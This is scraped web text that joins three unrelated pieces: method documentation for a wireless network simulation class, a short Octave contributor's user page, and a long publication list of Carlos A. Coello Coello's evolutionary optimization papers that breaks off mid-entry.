#### set_num_rf_chains(Lt,Lr) Usage: set_num_rf_chains(Lt) set_num_rf_chains(Lt,Lr) Input Arguments: Lt — number of transmit RF chains Lr — (optional) number of receive RF chains; if not passed, the number of transmit RF chains is used Back to methods #### set_num_streams(num_streams) Sets the number of streams on each link. Usage: set_num_streams(num_streams) Input Arguments: num_streams — number of data streams Back to methods #### set_path_loss(path_loss_object) Sets the path loss model used on each link. Usage: set_path_loss(path_loss_object) Input Arguments: path_loss_object — a path loss object Back to methods #### set_propagation_velocity(velocity) Sets the propagation vecocity on each link. Usage: set_propagation_velocity(velocity) Input Arguments: velocity — propagation velocity in meters per second Notes: Back to methods #### set_snr(snr_forward,snr_reverse,unit) Sets the large-scale SNR on each of the links. Usage: set_snr(snr_forward) set_snr(snr_forward,[],unit) set_snr(snr_forward,snr_reverse,unit) Input Arguments: snr_forward — the SNR to use on the forward links snr_reverse — (optional) the SNR to use on the reverse links; if not passed, snr_forward is used; unit — (optional) a string specifying the units of snr_forward and snr_reverse (e.g., ‘dB’ or ‘linear’) Back to methods #### set_symbol_bandwidth(B) Sets the symbol bandwidth on each link. Usage: set_symbol_bandwidth(B) Input Arguments: B — symbol bandwidth in Hertz Back to methods #### set_transmit_power(P,unit) Sets the transmit power used on each link. Usage: set_transmit_power(P) set_transmit_power(P,unit) Input Arguments: P — transmit power unit — (optional) a string specifying the unit of P (e.g., ‘dBm’, ‘watts’); if not passed, the default is used Back to methods #### set_transmit_symbol(s) Sets the transmit symbol used on each link. Usage: set_transmit_symbol(s) Input Arguments: s — a symbol vector Back to methods #### set_transmit_symbol_covariance(Rs) Sets the transmit covariance on each link. Usage: set_transmit_symbol_covariance(Rs) Input Arguments: Rs — a covariance matrix Back to methods #### show_2d(fignum) Displays the network in 2-D. Usage: show_2d() show_2d(fignum) Input Arguments: fignum — (optional) a figure number; if not passed, a new figure will be created Return Values: fig — the resulting a figure handle Back to methods #### show_3d(fignum) Displays the network in 3-D. Usage: show_3d() show_3d(fignum) Input Arguments: fignum — (optional) a figure number; if not passed, a new figure will be created Return Values: fig — the resulting a figure handle Back to methods #### supply_channel_state_information() Supplies channel state information to each of the sources and destinations in the network. Usage: supply_channel_state_information() Back to methods
# Siko1056 Joined 14 April 2013 ## Who am I My name is Kai Torben Ohlhus. During the GSoC 2013 I started working on incomplete factorizations for Octave (read my blog) and did some minor contributions so far. My area of interest is computer arithmetic and reliable computing techniques. My nickname is siko1056 on IRC and alike. ${\displaystyle e^{x}}$
Carlos A. Coello Coello According to our database1, Carlos A. Coello Coello authored at least 424 papers between 1994 and 2020. Collaborative distances: IEEE Fellow IEEE Fellow 2011, "For contributions to multi-objective optimization and constraint-handling techniques". Book In proceedings Article PhD thesis Other Bibliography 2020 A Parallel Island Model for Hypervolume-Based Many-Objective Optimization. Proceedings of the High-Performance Simulation-Based Optimization, 2020 Evolutionary Black-Box Topology Optimization: Challenges and Promises. IEEE Trans. Evol. Comput., 2020 Hybrid evolutionary multi-objective optimisation using outranking-based ordinal classification methods. Swarm Evol. Comput., 2020 Using evolutionary computation to infer the decision maker's preference model in presence of imperfect knowledge: A case study in portfolio optimization. Swarm Evol. Comput., 2020 Dynamic urban land-use change management using multi-objective evolutionary algorithms. Soft Comput., 2020 Evolutionary approach for large-Scale mine scheduling. Inf. Sci., 2020 Indicator-based Multi-objective Evolutionary Algorithms: A Comprehensive Survey. ACM Comput. Surv., 2020 A Study of Swarm Topologies and Their Influence on the Performance of Multi-Objective Particle Swarm Optimizers. Proceedings of the Parallel Problem Solving from Nature - PPSN XVI, 2020 Generation of New Scalarizing Functions Using Genetic Programming. Proceedings of the Parallel Problem Solving from Nature - PPSN XVI, 2020 Cooperative Co-Evolutionary Genetic Programming for High Dimensional Problems. Proceedings of the Parallel Problem Solving from Nature - PPSN XVI, 2020 A SHADE-Based Algorithm for Large Scale Global Optimization. Proceedings of the Parallel Problem Solving from Nature - PPSN XVI, 2020 An Ensemble Indicator-Based Density Estimator for Evolutionary Multi-objective Optimization. Proceedings of the Parallel Problem Solving from Nature - PPSN XVI, 2020 Handling uncertainty in code smells detection using a possibilistic SBSE approach. Proceedings of the GECCO '20: Genetic and Evolutionary Computation Conference, 2020 Multi-objective evolutionary GAN. Proceedings of the GECCO '20: Genetic and Evolutionary Computation Conference, 2020 Riesz s-energy-based Reference Sets for Multi-Objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2020 Enhancing Evolutionary Algorithms by Efficient Population Initialization for Constrained Problems. Proceedings of the IEEE Congress on Evolutionary Computation, 2020 Coevolutionary Operations for Large Scale Multi-objective Optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2020 2019 An Effective Ensemble Framework for Multiobjective Optimization. IEEE Trans. Evol. Comput., 2019 A Review of Features and Limitations of Existing Scalable Multiobjective Test Suites. IEEE Trans. Evol. Comput., 2019 A Clustering-Based Evolutionary Algorithm for Many-Objective Optimization Problems. IEEE Trans. Evol. Comput., 2019 Reliable Link Inference for Network Data With Community Structures. IEEE Trans. Cybern., 2019 Fuzzy Rule-Based Design of Evolutionary Algorithm for Optimization. IEEE Trans. Cybern., 2019 Handling uncertainty through confidence intervals in portfolio optimization. Swarm Evol. Comput., 2019 Bio-inspired computation: Where we stand and what's next. Swarm Evol. Comput., 2019 Divide-and-conquer based non-dominated sorting with Reduced Comparisons. Swarm Evol. Comput., 2019 A divide-and-conquer based efficient non-dominated sorting approach. Swarm Evol. Comput., 2019 Foreword: Some advances in Immune Computation and applications. Swarm Evol. Comput., 2019 A novel multi-objective evolutionary algorithm with dynamic decomposition strategy. Swarm Evol. Comput., 2019 A novel approach to select the best portfolio considering the preferences of the decision maker. Swarm Evol. Comput., 2019 Evolutionary-based tailoring of synthetic instances for the Knapsack problem. Soft Comput., 2019 Multi-method based algorithm for multi-objective problems under uncertainty. Inf. Sci., 2019 Parallelism in divide-and-conquer non-dominated sorting: a theoretical study considering the PRAM-CREW model. J. Heuristics, 2019 IEEE CIS VP-Members Activities Vision Statement [Society Briefs]. IEEE Comput. Intell. Mag., 2019 A hybridized angle-encouragement-based decomposition approach for many-objective optimization problems. Appl. Soft Comput., 2019 A novel multi-objective immune algorithm with a decomposition-based clonal selection. Appl. Soft Comput., 2019 A Co-Evolutionary Scheme for Multi-Objective Evolutionary Algorithms Based on $\epsilon$ -Dominance. IEEE Access, 2019 A Proposal of a Multi-Objective Compact Particle Swarm Optimizer. Proceedings of the IEEE Symposium Series on Computational Intelligence, 2019 On the construction of pareto-compliant quality indicators. Proceedings of the Genetic and Evolutionary Computation Conference Companion, 2019 Convergence and diversity analysis of indicator-based multi-objective evolutionary algorithms. Proceedings of the Genetic and Evolutionary Computation Conference, 2019 Operational decomposition for large scale multi-objective optimization problems. Proceedings of the Genetic and Evolutionary Computation Conference Companion, 2019 CRI-EMOA: A Pareto-Front Shape Invariant Evolutionary Multi-objective Algorithm. Proceedings of the Evolutionary Multi-Criterion Optimization, 2019 Evolutionary Algorithm for Project Scheduling under Irregular Resource Changes. Proceedings of the IEEE Congress on Evolutionary Computation, 2019 Parallel Best Order Sort for Non-dominated Sorting: A Theoretical Study Considering the PRAM-CREW Model. Proceedings of the IEEE Congress on Evolutionary Computation, 2019 An Approach for Non-domination Level Update Problem in Steady-State Evolutionary Algorithms With Parallelism. Proceedings of the IEEE Congress on Evolutionary Computation, 2019 The g̑-dominance Relation for Preference-Based Evolutionary Multi-Objective Optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2019 A Simple and Effective Termination Condition for Both Single- and Multi-Objective Evolutionary Algorithms. Proceedings of the IEEE Congress on Evolutionary Computation, 2019 On the Cooperation of Multiple Indicator-based Multi-Objective Evolutionary Algorithms. Proceedings of the IEEE Congress on Evolutionary Computation, 2019 2018 Multi-objective Optimization. Proceedings of the Handbook of Heuristics., 2018 Particle Swarm Optimization With a Balanceable Fitness Estimation for Many-Objective Optimization Problems. IEEE Trans. Evol. Comput., 2018 Coevolutionary Multiobjective Evolutionary Algorithms: Survey of the State-of-the-Art. IEEE Trans. Evol. Comput., 2018 A Diversity-Enhanced Resource Allocation Strategy for Decomposition-Based Multiobjective Evolutionary Algorithm. IEEE Trans. Cybern., 2018 GBOS: Generalized Best Order Sort algorithm for non-dominated sorting. Swarm Evol. Comput., 2018 Swarm Evol. Comput., 2018 Adaptation of operators and continuous control parameters in differential evolution for constrained optimization. Soft Comput., 2018 Evolutionary many-objective optimization based on linear assignment problem transformations. Soft Comput., 2018 An adaptive immune-inspired multi-objective algorithm with multiple differential evolution strategies. Inf. Sci., 2018 Finding short and implementation-friendly addition chains with evolutionary algorithms. J. Heuristics, 2018 Multiobjective Personalized Recommendation Algorithm Using Extreme Point Guided Evolutionary Computation. Complexity, 2018 MC2ESVM: Multiclass Classification Based on Cooperative Evolution of Support Vector Machines. IEEE Comput. Intell. Mag., 2018 Enhancing Selection Hyper-Heuristics via Feature Transformations. IEEE Comput. Intell. Mag., 2018 Studying the Effect of Robustness Measures in Offline Parameter Tuning for Estimating the Performance of MOEA/D. Proceedings of the IEEE Symposium Series on Computational Intelligence, 2018 An Adaptive Recombination-Based Extension of the iMOACOR Algorithm. Proceedings of the IEEE Symposium Series on Computational Intelligence, 2018 Extending the Speed-Constrained Multi-objective PSO (SMPSO) with Reference Point Based Preference Articulation. Proceedings of the Parallel Problem Solving from Nature - PPSN XV, 2018 Use of Reference Point Sets in a Decomposition-Based Multi-Objective Evolutionary Algorithm. Proceedings of the Parallel Problem Solving from Nature - PPSN XV, 2018 Towards a More General Many-objective Evolutionary Optimizer. Proceedings of the Parallel Problem Solving from Nature - PPSN XV, 2018 Tailoring Instances of the 1D Bin Packing Problem for Assessing Strengths and Weaknesses of Its Solvers. Proceedings of the Parallel Problem Solving from Nature - PPSN XV, 2018 Cooperative multi-objective evolutionary support vector machines for multiclass problems. Proceedings of the Genetic and Evolutionary Computation Conference, 2018 Studying the effect of techniques to generate reference vectors in many-objective optimization. Proceedings of the Genetic and Evolutionary Computation Conference Companion, 2018 An improved version of a reference-based multi-objective evolutionary algorithm based on IGD<sup>+</sup>. Proceedings of the Genetic and Evolutionary Computation Conference, 2018 Towards a more general many-objective evolutionary optimizer using multi-indicator density estimation. Proceedings of the Genetic and Evolutionary Computation Conference Companion, 2018 A multi-objective evolutionary hyper-heuristic based on multiple indicator-based density estimators. Proceedings of the Genetic and Evolutionary Computation Conference, 2018 Collaborative and Adaptive Strategies of Different Scalarizing Functions in MOEA/D. Proceedings of the 2018 IEEE Congress on Evolutionary Computation, 2018 P-ENS: Parallelism in Efficient Non-Dominated Sorting. Proceedings of the 2018 IEEE Congress on Evolutionary Computation, 2018 A Cooperative Opposite-Inspired Learning Strategy for Ant-Based Algorithms. Proceedings of the Swarm Intelligence - 11th International Conference, 2018 2017 An Evolutionary Multiobjective Model and Instance Selection for Support Vector Machines With Pareto-Based Ensembles. IEEE Trans. Evol. Comput., 2017 An External Archive-Guided Multiobjective Particle Swarm Optimization Algorithm. IEEE Trans. Cybern., 2017 Sequence-Based Deterministic Initialization for Evolutionary Algorithms. IEEE Trans. Cybern., 2017 A new indicator-based many-objective ant colony optimizer for continuous search spaces. Swarm Intell., 2017 An alternative hypervolume-based selection mechanism for multi-objective evolutionary algorithms. Soft Comput., 2017 Comparison of metamodeling techniques in evolutionary algorithms. Soft Comput., 2017 Consolidated optimization algorithm for resource-constrained project scheduling problems. Inf. Sci., 2017 Recent advances in immunological inspired computation. Eng. Appl. Artif. Intell., 2017 Incorporation of implicit decision-maker preferences in multi-objective evolutionary optimization using a multi-criteria classification method. Appl. Soft Comput., 2017 Recent Results and Open Problems in Evolutionary Multiobjective Optimization. Proceedings of the Theory and Practice of Natural Computing - 6th International Conference, 2017 A hyper-heuristic of scalarizing functions. Proceedings of the Genetic and Evolutionary Computation Conference, 2017 On the mutual information as a fitness landscape measure. Proceedings of the Genetic and Evolutionary Computation Conference, 2017 An Overview of Weighted and Unconstrained Scalarizing Functions. Proceedings of the Evolutionary Multi-Criterion Optimization, 2017 Evolutionary multilabel hyper-heuristic design. Proceedings of the 2017 IEEE Congress on Evolutionary Computation, 2017 Improving the integration of the IGD<sup>+</sup> indicator into the selection mechanism of a Multi-objective Evolutionary Algorithm. Proceedings of the 2017 IEEE Congress on Evolutionary Computation, 2017 Applying automatic heuristic-filtering to improve hyper-heuristic performance. Proceedings of the 2017 IEEE Congress on Evolutionary Computation, 2017 Improving hyper-heuristic performance through feature transformation. Proceedings of the 2017 IEEE Congress on Evolutionary Computation, 2017 2016 A Hybrid Evolutionary Immune Algorithm for Multiobjective Optimization Problems. IEEE Trans. Evol. Comput., 2016 A Novel Diversity-Based Replacement Strategy for Evolutionary Algorithms. IEEE Trans. Cybern., 2016 Selection mechanisms based on the maximin fitness function to solve multi-objective optimization problems. Inf. Sci., 2016 Adaptive composite operator selection and parameter control for multiobjective evolutionary algorithm. Inf. Sci., 2016 EMOPG+FS: Evolutionary multi-objective prototype generation and feature selection. Intell. Data Anal., 2016 Limiting the Velocity in the Particle Swarm Optimization Algorithm. Computación y Sistemas, 2016 The directed search method for multi-objective memetic algorithms. Comput. Optim. Appl., 2016 Distributed Multi-Objective Metaheuristics for Real-World Structural Optimization Problems. Comput. J., 2016 Using multi-objective evolutionary algorithms for single-objective constrained and unconstrained optimization. Ann. Oper. Res., 2016 A novel local search mechanism based on the reflected ray tracing method coupled to MOEA/D. Proceedings of the 2016 IEEE Symposium Series on Computational Intelligence, 2016 A Parallel Multi-objective Memetic Algorithm Based on the IGD+ Indicator. Proceedings of the Parallel Problem Solving from Nature - PPSN XIV, 2016 A Parallel Version of SMS-EMOA for Many-Objective Optimization Problems. Proceedings of the Parallel Problem Solving from Nature - PPSN XIV, 2016 iMOACO _\mathbb R : A New Indicator-Based Multi-objective Ant Colony Optimization Algorithm for Continuous Search Spaces. Proceedings of the Parallel Problem Solving from Nature - PPSN XIV, 2016 Decomposition-Based Approach for Solving Large Scale Multi-objective Problems. Proceedings of the Parallel Problem Solving from Nature - PPSN XIV, 2016 A Multi-Objective Evolutionary Algorithm based on Parallel Coordinates. Proceedings of the 2016 on Genetic and Evolutionary Computation Conference, Denver, CO, USA, July 20, 2016 Parallel SMS-EMOA for Many-Objective Optimization Problems. Proceedings of the Genetic and Evolutionary Computation Conference, 2016 Evolutionary Algorithms for Finding Short Addition Chains: Going the Distance. Proceedings of the Evolutionary Computation in Combinatorial Optimization, 2016 Δp-MOEA: A new multi-objective evolutionary algorithm based on the Δp indicator. Proceedings of the IEEE Congress on Evolutionary Computation, 2016 IGD<sup>+</sup>-EMOA: A multi-objective evolutionary algorithm based on IGD<sup>+</sup>. Proceedings of the IEEE Congress on Evolutionary Computation, 2016 Applying exponential weighting moving average control parameter adaptation technique with generalized differential evolution. Proceedings of the IEEE Congress on Evolutionary Computation, 2016 Enhanced multi-operator differential evolution for constrained optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2016 Indicator-based cooperative coevolution for multi-objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2016 2015 Many-Objective Problems: Challenges and Methods. Proceedings of the Springer Handbook of Computational Intelligence, 2015 On the adaptation of the mutation scale factor in differential evolution. Optim. Lett., 2015 Algorithms and models for complex natural systems. Nat. Comput., 2015 Improving the vector generation strategy of Differential Evolution for large-scale optimization. Inf. Sci., 2015 An immune algorithm with power redistribution for solving economic dispatch problems. Inf. Sci., 2015 Surrogate-assisted multi-objective model selection for support vector machines. Neurocomputing, 2015 Generalized Differential Evolution for Numerical and Evolutionary Optimization. Proceedings of the NEO 2015, 2015 Improved Metaheuristic Based on the R2 Indicator for Many-Objective Optimization. Proceedings of the Genetic and Evolutionary Computation Conference, 2015 Particle Swarm Optimization Based on Linear Assignment Problem Transformations. Proceedings of the Genetic and Evolutionary Computation Conference, 2015 GD-MOEA: A New Multi-Objective Evolutionary Algorithm Based on the Generational Distance Indicator. Proceedings of the Evolutionary Multi-Criterion Optimization, 2015 A GPU-Based Algorithm for a Faster Hypervolume Contribution Computation. Proceedings of the Evolutionary Multi-Criterion Optimization, 2015 Evolutionary Many-Objective Optimization Based on Kuhn-Munkres' Algorithm. Proceedings of the Evolutionary Multi-Criterion Optimization, 2015 GDE-MOEA: A new MOEA based on the Generational Distance indicator and ε-dominance. Proceedings of the IEEE Congress on Evolutionary Computation, 2015 On the low-discrepancy sequences and their use in MOEA/D for high-dimensional objective spaces. Proceedings of the IEEE Congress on Evolutionary Computation, 2015 A Non-cooperative game for faster convergence in cooperative coevolution for multi-objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2015 2014 Guest Editorial: Special Issue on Advances in Multiobjective Evolutionary Algorithms for Data Mining. IEEE Trans. Evol. Comput., 2014 Survey of Multiobjective Evolutionary Algorithms for Data Mining: Part II. IEEE Trans. Evol. Comput., 2014 A Survey of Multiobjective Evolutionary Algorithms for Data Mining: Part I. IEEE Trans. Evol. Comput., 2014 Objective space partitioning using conflict information for solving many-objective problems. Inf. Sci., 2014 Including preferences into a multiobjective evolutionary algorithm to deal with many-objective engineering optimization problems. Inf. Sci., 2014 A comparative study of variation operators used for evolutionary multi-objective optimization. Inf. Sci., 2014 Multi-objective model type selection. Neurocomputing, 2014 Decomposition-based modern metaheuristic algorithms for multi-objective optimal power flow - A comparative study. Eng. Appl. Artif. Intell., 2014 Multi-objective compact differential evolution. Proceedings of the 2014 IEEE Symposium on Differential Evolution, 2014 MH-MOEA: A New Multi-Objective Evolutionary Algorithm Based on the Maximin Fitness Function and the Hypervolume Indicator. Proceedings of the Parallel Problem Solving from Nature - PPSN XIII, 2014 Using a Family of Curves to Approximate the Pareto Front of a Multi-Objective Optimization Problem. Proceedings of the Parallel Problem Solving from Nature - PPSN XIII, 2014 A More Efficient Selection Scheme in iSMS-EMOA. Proceedings of the Advances in Artificial Intelligence - IBERAMIA 2014, 2014 Constrained multi-objective aerodynamic shape optimization via swarm intelligence. Proceedings of the Genetic and Evolutionary Computation Conference, 2014 Evolutionary Multi-Objective Approach for Prototype Generation and Feature Selection. Proceedings of the Progress in Pattern Recognition, Image Analysis, Computer Vision, and Applications, 2014 An Introduction to Evolutionary Multi-objective Optimization with Some Applications in Pattern Recognition. Proceedings of the Progress in Pattern Recognition, Image Analysis, Computer Vision, and Applications, 2014 An analysis of the automatic adaptation of the crossover rate in differential evolution. Proceedings of the IEEE Congress on Evolutionary Computation, 2014 An evolutionary multi-objective approach for prototype generation. Proceedings of the IEEE Congress on Evolutionary Computation, 2014 MD-MOEA : A new MOEA based on the maximin fitness function and Euclidean distances between solutions. Proceedings of the IEEE Congress on Evolutionary Computation, 2014 A multi-objective evolutionary algorithm based on decomposition for constrained multi-objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2014 MOPSOhv: A new hypervolume-based multi-objective particle swarm optimizer. Proceedings of the IEEE Congress on Evolutionary Computation, 2014 Evolutionary multiobjective optimization in dynamic environments: A set of novel benchmark functions. Proceedings of the IEEE Congress on Evolutionary Computation, 2014 2013 On Gradient-Based Local Search to Hybridize Multi-objective Evolutionary Algorithms. Proceedings of the EVOLVE, 2013 Artificial Immune System for Solving Dynamic Constrained Optimization Problems. Proceedings of the Metaheuristics for Dynamic Optimization, 2013 A Survey on Multiobjective Evolutionary Algorithms for the Solution of the Portfolio Optimization Problem and Other Finance and Economics Applications. IEEE Trans. Evol. Comput., 2013 Special issue on evolutionary computing and complex systems. Soft Comput., 2013 Application of the non-outranked sorting genetic algorithm to public project portfolio selection. Inf. Sci., 2013 Conference Report for 2013 IEEE Congress on Evolutionary Computation (IEEE CEC 2013) [Conference Reports]. IEEE Comput. Intell. Mag., 2013 An evolutionary algorithm with a history mechanism for tuning a chess evaluation function. Appl. Soft Comput., 2013 A hybrid Differential Evolution - Tabu Search algorithm for the solution of Job-Shop Scheduling Problems. Appl. Soft Comput., 2013 Guest editorial: Special issue - revised selected papers of the LION 5 conference. Ann. Math. Artif. Intell., 2013 Using multi-objective evolutionary algorithms for single-objective optimization. 4OR, 2013 Flame Classification through the Use of an Artificial Neural Network Trained with a Genetic Algorithm. Proceedings of the Advances in Soft Computing and Its Applications, 2013 Introduction. Proceedings of the 10th International Conference on Electrical Engineering, 2013 Bias and Variance Multi-objective Optimization for Support Vector Machines Model Selection. Proceedings of the Pattern Recognition and Image Analysis - 6th Iberian Conference, 2013 MOEA/D assisted by rbf networks for expensive multi-objective optimization problems. Proceedings of the Genetic and Evolutionary Computation Conference, 2013 Selection Operators Based on Maximin Fitness Function for Multi-Objective Evolutionary Algorithms. Proceedings of the Evolutionary Multi-Criterion Optimization, 2013 An Alternative Preference Relation to Deal with Many-Objective Optimization Problems. Proceedings of the Evolutionary Multi-Criterion Optimization, 2013 Two decomposition-based modem metaheuristic algorithms for multi-objective optimization - A comparative study. Proceedings of the 2013 IEEE Symposium on Computational Intelligence in Multi-Criteria Decision-Making, 2013 A hybridization of MOEA/D with the nonlinear simplex search algorithm. Proceedings of the 2013 IEEE Symposium on Computational Intelligence in Multi-Criteria Decision-Making, 2013 An adaptive evolutionary algorithm based on tactical and positional chess problems to adjust the weights of a chess engine. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 Improving the diversity preservation of multi-objective approaches used for single-objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 A hybrid surrogate-based approach for evolutionary multi-objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 Dynamic Constrained Optimization with offspring repair based Gravitational Search Algorithm. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 Analysis of leader selection strategies in a multi-objective Particle Swarm Optimizer. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 A new selection mechanism based on hypervolume and its locality property. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 Combining surrogate models and local search for dealing with expensive multi-objective optimization problems. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 Goal-constraint: Incorporating preferences through an evolutionary ε-constraint based method. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 MOMBI: A new metaheuristic for many-objective optimization based on the R2 indicator. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 A ranking method based on the R2 indicator for many-objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 Use of cooperative coevolution for solving large scale multiobjective optimization problems. Proceedings of the IEEE Congress on Evolutionary Computation, 2013 A Study of the Combination of Variation Operators in the NSGA-II Algorithm. Proceedings of the Advances in Artificial Intelligence, 2013 Solving a Real-World Structural Optimization Problem with a Distributed SMS-EMOA Algorithm. Proceedings of the Eighth International Conference on P2P, 2013 2012 Using the Averaged Hausdorff Distance as a Performance Measure in Evolutionary Multiobjective Optimization. IEEE Trans. Evol. Comput., 2012 Multiobjective Evolutionary Algorithms in Aeronautical and Aerospace Engineering. IEEE Trans. Evol. Comput., 2012 Special issue on evolutionary computation on general purpose graphics processing units. Soft Comput., 2012 Optimization on complex systems. Memetic Comput., 2012 Dynamic control of the number of crossed genes in evolutionary many-objective optimization. Proceedings of the 6th International Conference on Soft Computing and Intelligent Systems (SCIS), 2012 Are State-of-the-Art Fine-Tuning Algorithms Able to Detect a Dummy Parameter? Proceedings of the Parallel Problem Solving from Nature - PPSN XII, 2012 Adaptive Control of the Number of Crossed Genes in Many-Objective Evolutionary Optimization. Proceedings of the Learning and Intelligent Optimization - 6th International Conference, 2012 A Multi-Objective Artificial Immune System Based on Hypervolume. Proceedings of the Artificial Immune Systems - 11th International Conference, 2012 A new multi-objective evolutionary algorithm based on a performance assessment indicator. Proceedings of the Genetic and Evolutionary Computation Conference, 2012 <i>hyp</i>DE: A Hyper-Heuristic Based on Differential Evolution for Solving Constrained Optimization Problems. Proceedings of the EVOLVE, 2012 The Gradient Free Directed Search Method as Local Search within Multi-Objective Evolutionary Algorithms. Proceedings of the EVOLVE, 2012 An evolutionary algorithm coupled with the Hooke-Jeeves algorithm for tuning a chess evaluation function. Proceedings of the IEEE Congress on Evolutionary Computation, 2012 A Multi-Objective Evolutionary approach for linear antenna array design and synthesis. Proceedings of the IEEE Congress on Evolutionary Computation, 2012 Multi-objective airfoil shape optimization using a multiple-surrogate approach. Proceedings of the IEEE Congress on Evolutionary Computation, 2012 Solving multi-objective optimization problems using differential evolution and a maximin selection criterion. Proceedings of the IEEE Congress on Evolutionary Computation, 2012 A direct local search mechanism for decomposition-based multi-objective evolutionary algorithms. Proceedings of the IEEE Congress on Evolutionary Computation, 2012 A Fitness Granulation Approach for Large-Scale Structural Design Optimization. Proceedings of the Variants of Evolutionary Algorithms for Real-World Applications, 2012 2011 Multi-Objective Ant Colony Optimization: A Taxonomy and Review of Approaches. Proceedings of the Integration of Swarm Intelligence and Artificial Neural Network, 2011 Evolutionary Algorithms Applied to Multi-Objective Aerodynamic Shape Optimization. Proceedings of the Computational Optimization, Methods and Algorithms, 2011 Evolutionary multiobjective optimization. Wiley Interdiscip. Rev. Data Min. Knowl. Discov., 2011 On the Influence of the Number of Objectives on the Hardness of a Multiobjective Optimization Problem. IEEE Trans. Evol. Comput., 2011 Guest Editorial Special Issue on Differential Evolution. IEEE Trans. Evol. Comput., 2011 Constraint-handling in nature-inspired numerical optimization: Past, present and future. Swarm Evol. Comput., 2011 MB-GNG: Addressing drawbacks in multi-objective optimization estimation of distribution algorithms. Oper. Res. Lett., 2011 Computing the Set of Epsilon-Efficient Solutions in Multiobjective Space Mission Design. J. Aerosp. Comput. Inf. Commun., 2011 Improving the efficiency of ϵ-dominance based grids. Inf. Sci., 2011 Increasing selective pressure towards the best compromise in evolutionary multiobjective optimization: The extended NOSGA method. Inf. Sci., 2011 A T-cell algorithm for solving dynamic optimization problems. Inf. Sci., 2011 Parametric reconfiguration improvement in non-iterative concurrent mechatronic design using an evolutionary-based approach. Eng. Appl. Artif. Intell., 2011 Solving timetabling problems using a cultural algorithm. Appl. Soft Comput., 2011 Differential Evolution performances for the solution of mixed-integer constrained process engineering problems. Appl. Soft Comput., 2011 Smiling at evolution. Appl. Soft Comput., 2011 Evolutionary Multi-Objective Optimization: Basic Concepts and Some Applications in Pattern Recognition. Proceedings of the Pattern Recognition - Third Mexican Conference, 2011 Self-adaptation Techniques Applied to Multi-Objective Evolutionary Algorithms. Proceedings of the Learning and Intelligent Optimization - 5th International Conference, 2011 An adaptive evolutionary algorithm based on typical chess problems for tuning a chess evaluation function. Proceedings of the 13th Annual Genetic and Evolutionary Computation Conference, 2011 Swarm intelligence guided by multi-objective mathematical programming techniques. Proceedings of the 13th Annual Genetic and Evolutionary Computation Conference, 2011 A multi-objective particle swarm optimizer based on decomposition. Proceedings of the 13th Annual Genetic and Evolutionary Computation Conference, 2011 Constraint-handling techniques used with evolutionary algorithms. Proceedings of the 13th Annual Genetic and Evolutionary Computation Conference, 2011 Adaptive Objective Space Partitioning Using Conflict Information for Many-Objective Optimization. Proceedings of the Evolutionary Multi-Criterion Optimization, 2011 An evolutionary algorithm for tuning a chess evaluation function. Proceedings of the IEEE Congress on Evolutionary Computation, 2011 A nonlinear simplex search approach for multi-objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2011 A Multi-Region Differential Evolution approach for continuous optimization problems. Proceedings of the IEEE Congress on Evolutionary Computation, 2011 Preference incorporation to solve many-objective airfoil design problems. Proceedings of the IEEE Congress on Evolutionary Computation, 2011 Effective ranking + speciation = Many-objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2011 Accelerating convergence towards the optimal pareto front. Proceedings of the IEEE Congress on Evolutionary Computation, 2011 A Multi-objective Particle Swarm Optimizer Enhanced with a Differential Evolution Scheme. Proceedings of the Artificial Evolution, 2011 2010 Multi-Objective Combinatorial Optimization: Problematic and Context. Proceedings of the Advances in Multi-Objective Nature Inspired Computing, 2010 Micro-MOPSO: A Multi-Objective Particle Swarm Optimizer That Uses a Very Small Population Size. Proceedings of the Multi-Objective Swarm Intelligent Systems - Theory & Experiences, 2010 HCS: A New Local Search Strategy for Memetic Multiobjective Evolutionary Algorithms. IEEE Trans. Evol. Comput., 2010 A Study of Multiobjective Metaheuristics When Solving Parameter Scalable Problems. IEEE Trans. Evol. Comput., 2010 Computing Gap Free Pareto Front Approximations with Stochastic Search Algorithms. Evol. Comput., 2010 DEMORS: A hybrid multi-objective optimization algorithm using differential evolution and rough set theory for constrained problems. Comput. Oper. Res., 2010 Evolutionary multiobjective optimization using an outranking-based dominance generalization. Comput. Oper. Res., 2010 Evolutionary hidden information detection by granulation-based fitness approximation. Appl. Soft Comput., 2010 The Turing-850 Project: Developing a Personal Computer in the Early 1980s in Mexico. IEEE Ann. Hist. Comput., 2010 Artificial Immune System for Solving Global Optimization Problems. Inteligencia Artif., 2010 Testing the Permutation Space Based Geometric Differential Evolution on the Job-Shop Scheduling Problem. Proceedings of the Parallel Problem Solving from Nature, 2010 pMODE-LD+SS: An Effective and Efficient Parallel Differential Evolution Algorithm for Multi-Objective Optimization. Proceedings of the Parallel Problem Solving from Nature, 2010 A Memetic Algorithm with Non Gradient-Based Local Search Assisted by a Meta-model. Proceedings of the Parallel Problem Solving from Nature, 2010 Objective Space Partitioning Using Conflict Information for Many-Objective Optimization. Proceedings of the Parallel Problem Solving from Nature, 2010 Some comments on GD and IGD and relations to the Hausdorff distance. Proceedings of the Genetic and Evolutionary Computation Conference, 2010 A novel diversification strategy for multi-objective evolutionary algorithms. Proceedings of the Genetic and Evolutionary Computation Conference, 2010 A multi-objective meta-model assisted memetic algorithm with non gradient-based local search. Proceedings of the Genetic and Evolutionary Computation Conference, 2010 New challenges for memetic algorithms on continuous multi-objective problems. Proceedings of the Genetic and Evolutionary Computation Conference, 2010 Using gradient information for multi-objective problems in the evolutionary context. Proceedings of the Genetic and Evolutionary Computation Conference, 2010 Computing approximate solutions of scalar optimization problems and applications in space mission design. Proceedings of the IEEE Congress on 